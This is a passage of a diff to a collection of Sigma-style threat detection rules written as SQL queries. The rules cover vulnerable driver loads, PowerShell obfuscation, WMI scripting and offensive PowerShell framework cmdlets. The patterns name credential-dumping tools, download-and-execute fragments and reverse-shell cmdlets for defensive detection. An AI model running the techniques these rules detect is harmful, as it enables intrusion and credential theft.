ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": 
"1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.execution", - 
"attack.t1021.002", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": 
"win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell 
Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - 
"Unlikely" + "Legitimate use remote PowerShell sessions" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", 
@@ -2867,1137 +2815,1109 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" - ], - "filename": "win_mssql_xp_cmdshell_change.yml" - }, - { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE 
'%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload 
